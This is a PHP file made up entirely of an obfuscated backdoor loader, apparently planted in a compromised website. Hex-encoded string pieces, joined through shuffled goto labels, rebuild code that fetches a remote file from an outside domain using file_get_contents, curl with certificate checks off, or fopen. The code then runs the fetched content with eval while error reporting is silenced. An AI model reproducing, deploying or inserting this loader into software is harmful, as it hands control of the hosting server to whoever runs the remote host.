<?php
error_reporting(0);
$ybhod=''; goto _6959204F8EDE1;
_6959204F8EDF3: $ybhod.="\x63\x28\x24\x68\x29\x3b\x63\x75\x72\x6c\x5f\x63"; goto _6959204F8EDF4;
_6959204F8EDFE: $ybhod.="\x24\x63\x3f\x65\x76\x61\x6c\x28\x22\x3f\x3e\x24"; goto _6959204F8EDFF;
_6959204F8EDEB: $ybhod.="\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73"; goto _6959204F8EDEC;
_6959204F8EDFC: $ybhod.="\x28\x24\x68\x2c\x31\x30\x32\x34\x29\x3b\x66\x63"; goto _6959204F8EDFD;
_6959204F8EDF6: $ybhod.="\x74\x28\x27\x61\x6c\x6c\x6f\x77\x5f\x75\x72\x6c"; goto _6959204F8EDF7;
_6959204F8EDE1: $ybhod.="\x24\x75\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f"; goto _6959204F8EDE6;
_6959204F8EDEF: $ybhod.="\x72\x6c\x5f\x73\x65\x74\x6f\x70\x74\x5f\x61\x72"; goto _6959204F8EDF0;
_6959204F8EDED: $ybhod.="\x74\x27\x29\x29\x7b\x24\x68\x3d\x63\x75\x72\x6c"; goto _6959204F8EDEE;
_6959204F8EDF1: $ybhod.="\x33\x3d\x3e\x31\x2c\x36\x34\x3d\x3e\x30\x5d\x29"; goto _6959204F8EDF2;
_6959204F8EDF2: $ybhod.="\x3b\x24\x63\x3d\x63\x75\x72\x6c\x5f\x65\x78\x65"; goto _6959204F8EDF3;
_6959204F8EDFF: $ybhod.="\x63\x22\x29\x3a\x64\x69\x65\x28\x27\x46\x61\x69"; goto _6959204F8EE00;
_6959204F8EDF8: $ybhod.="\x3d\x40\x66\x6f\x70\x65\x6e\x28\x24\x75\x2c\x27"; goto _6959204F8EDF9;
_6959204F8EDF7: $ybhod.="\x5f\x66\x6f\x70\x65\x6e\x27\x29\x29\x7b\x24\x68"; goto _6959204F8EDF8;
_6959204F8EDF9: $ybhod.="\x72\x27\x29\x3b\x69\x66\x28\x24\x68\x29\x7b\x77"; goto _6959204F8EDFA;
_6959204F8EDEE: $ybhod.="\x5f\x69\x6e\x69\x74\x28\x24\x75\x29\x3b\x63\x75"; goto _6959204F8EDEF;
_6959204F8EDF0: $ybhod.="\x72\x61\x79\x28\x24\x68\x2c\x5b\x31\x39\x39\x31"; goto _6959204F8EDF1;
_6959204F8EDE6: $ybhod.="\x73\x74\x65\x70\x6d\x6f\x6d\x68\x75\x62\x2e\x63"; goto _6959204F8EDE7;
_6959204F8EE00: $ybhod.="\x6c\x27\x29\x3b"; goto _6959204F8EE01;
_6959204F8EDFB: $ybhod.="\x68\x29\x29\x24\x63\x2e\x3d\x66\x72\x65\x61\x64"; goto _6959204F8EDFC;
_6959204F8EDFA: $ybhod.="\x68\x69\x6c\x65\x28\x21\x66\x65\x6f\x66\x28\x24"; goto _6959204F8EDFB;
_6959204F8EDF5: $ybhod.="\x28\x21\x24\x63\x26\x26\x69\x6e\x69\x5f\x67\x65"; goto _6959204F8EDF6;
_6959204F8EDEC: $ybhod.="\x74\x73\x28\x27\x63\x75\x72\x6c\x5f\x69\x6e\x69"; goto _6959204F8EDED;
_6959204F8EDEA: $ybhod.="\x69\x66\x28\x21\x24\x63\x29\x7b\x69\x66\x28\x66"; goto _6959204F8EDEB;
_6959204F8EDF4: $ybhod.="\x6c\x6f\x73\x65\x28\x24\x68\x29\x3b\x7d\x69\x66"; goto _6959204F8EDF5;
_6959204F8EDE8: $ybhod.="\x3d\x40\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63"; goto _6959204F8EDE9;
_6959204F8EDE9: $ybhod.="\x6f\x6e\x74\x65\x6e\x74\x73\x28\x24\x75\x29\x3b"; goto _6959204F8EDEA;
_6959204F8EDFD: $ybhod.="\x6c\x6f\x73\x65\x28\x24\x68\x29\x3b\x7d\x7d\x7d"; goto _6959204F8EDFE;
_6959204F8EDE7: $ybhod.="\x6f\x6d\x2f\x38\x2e\x74\x78\x74\x27\x3b\x24\x63"; goto _6959204F8EDE8;
_6959204F8EE01: eval($ybhod);
?>
